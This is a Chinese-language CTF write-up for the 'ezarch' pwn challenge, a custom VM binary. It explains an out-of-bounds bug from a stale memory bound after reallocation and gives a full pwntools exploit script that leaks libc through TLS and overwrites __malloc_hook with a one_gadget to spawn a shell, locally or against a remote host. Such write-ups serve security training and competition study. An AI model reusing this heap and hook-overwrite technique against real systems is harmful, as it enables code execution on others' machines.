[Pwn] ezarch - cpt.shao xp0int Posted on Sep 11 2019 算是比较简单的vm题目,指令都是定长的比较舒服,逻辑也清晰。问题出在重新分配内存的时候,如果大小大于0xa00000,这时候size已经被修改了,但是代码段空间的范围并没有随之更新,因此能够造成一个越界读写。  在opcode编号为3的指令实现的是mov指令的功能,我们可以先把偏移值存放到一个寄存器中,然后用过mov指令去做越界读写。那么如何泄露地址呢?注意到在分配0x21000大小以上的空间时候,分配的空间恰好会位于tls段的上面,我们越界读取tls上的内容,上面就保存有libc地址,同时也能计算出分配的mem的地址。 但是这样分配出来的空间位于libc段的下方,受大小限制我们只能越界读写mem下方的内容。 其实题目这里已经有了个提示,只要分配0xa00000的空间,分配出来的地址就会落在libc段的上方,这样我们只要越界在mallochook写上onegadget的地址就可以get shell了。 ## exp.py ``` from pwn import * import re context.terminal = ['tmux', 'splitw', '-h'] context.arch = 'amd64' context.log_level = "debug" env = {'LD_PRELOAD': ''} if len(sys.argv) == 1: p = process('./ezarch') elif len(sys.argv) == 3: p = remote(sys.argv[1], sys.argv[2]) libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so') se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) sea = lambda delim,data :p.sendafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims, drop=True :p.recvuntil(delims, drop) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr)) def set_memory(size, content, eip, esp, ebp): sla(">", "M") sla("size>", str(size)) sla("size>", str(len(content))) sea("Now (", content) time.sleep(0.1) sla("eip>", str(eip)) sla("esp>", str(esp)) sla("ebp>", str(ebp)) def do_run(): sla(">", "R") def set_bp(addr): sla(">", "B") sla("bp>", str(addr)) sla("bp>", str(-1)) def setreg(dst, src): payload = p8(3) payload += p8(0x10) # src->esp, dst->reg payload += p32(dst) payload += p32(src) return payload def loadmem(dst, src): payload = p8(3) payload += p8(0x20) payload += p32(dst) payload += p32(src) return payload def setmem(dst, src): payload = p8(3) payload += p8(0x12) payload += p32(dst) payload += p32(src) return payload def set_largemem(): sla(">", "M") sla("size>", str(0xffffffff)) payload = setreg(1, 0x21ff8+0x20) + loadmem(2, 1) # leak libc at r1 payload += setreg(1, 0x21ff4+0x20) + loadmem(3, 1) # leak libc at r1 payload += setreg(1, 0x21ff0) + loadmem(4, 1) # leak libc at r1 payload += setreg(1, 0x21ff4) + loadmem(5, 1) # leak libc at r1 # bp(run) set_memory(0x21000, payload, 0, 0, 0) set_largemem() set_bp(80) do_run() # leak libc ru("R2 --> ") libc1 = int(ru("\n"),16) ru("R3 --> ") libc1 += int(ru("\n"), 16) * 0x100000000 info_addr("libc1", libc1) ru("R4 --> ") libc2 = int(ru("\n"),16) ru("R5 --> ") libc2 += int(ru("\n"), 16) * 0x100000000 info_addr("libc2", libc2) libc.address = libc2 base = libc2 - 0xa01000 + 0x10 info_addr("base", base) target = libc.symbols['__malloc_hook'] onegadget = libc.address + 0x4f322 payload = setreg(1, (target-base)) + setmem(1, onegadget & 0xffffffff) payload += setreg(1, (target-base+4)) + setmem(1, onegadget >> 32) # gdb.attach(p, gdbcmd) set_memory(0xa00000, payload, 0, 0, 0) set_largemem() do_run() sla(">", "M") sla("size>", str(1)) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [PWN] childjs - xfiles [PWN] mulnote - xfiles
没有帐号? 立即注册